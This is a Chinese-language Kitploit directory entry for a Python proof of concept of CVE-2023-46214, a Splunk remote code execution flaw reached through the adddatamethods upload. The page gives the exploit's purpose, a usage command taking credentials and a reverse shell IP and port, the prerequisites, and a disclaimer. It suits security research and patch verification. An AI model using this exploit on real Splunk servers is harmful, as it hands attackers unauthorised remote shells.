Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Splunk-RCE-poc — 基于 Python 的 CVE-2023-46214 PoC,利用 Splunk 的 adddatamethods 功能,通过反弹 shell 实现远程代码执行。 | Kitploit
工具/GitHubGitHub/nathan31337/splunk-rce-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubnathan31337/splunk-rce-poc

Splunk-RCE-poc

基于 Python 的 CVE-2023-46214 PoC,利用 Splunk 的 adddatamethods 功能,通过反弹 shell 实现远程代码执行。

查看仓库
114232年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Splunk RCE - 概念验证(PoC)

针对 CVE-2023-46214、SVD-2023-1104 的利用概念验证

poc

使用方法

Splunk 实例 URL、用户名、密码、反向 Shell IP 和端口均需作为命令行参数提供。例如:

root@kitploit:~
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

前置条件

  • 具有上传到 adddatamethods 权限的 Splunk 凭据
    • 注意:可能存在其他攻击途径,这只是我使用的方式
  • Splunk 未以 SHC 模式运行

分析

我撰写了一篇博客文章,详细介绍了发现此漏洞所采用的方法。如果你在运行脚本时遇到任何问题,这篇博客可能会有所帮助,因为它详细描述了利用的手动步骤。

对 CVE-2023-46214 的分析 + PoC

法律免责声明

本仓库中提供的概念验证(PoC)脚本仅用于教育和研究目的。其用途是展示特定漏洞并帮助理解相关的安全风险。

严禁将此脚本用于任何未经授权的活动,包括但不限于未经授权的系统访问、未经授权的测试或其他形式的滥用。

本仓库的创建者和贡献者不对因使用此脚本而导致的任何不当使用或任何损害承担责任。使用此脚本即表示你同意以负责任的方式使用它,并自行承担风险。

下载工具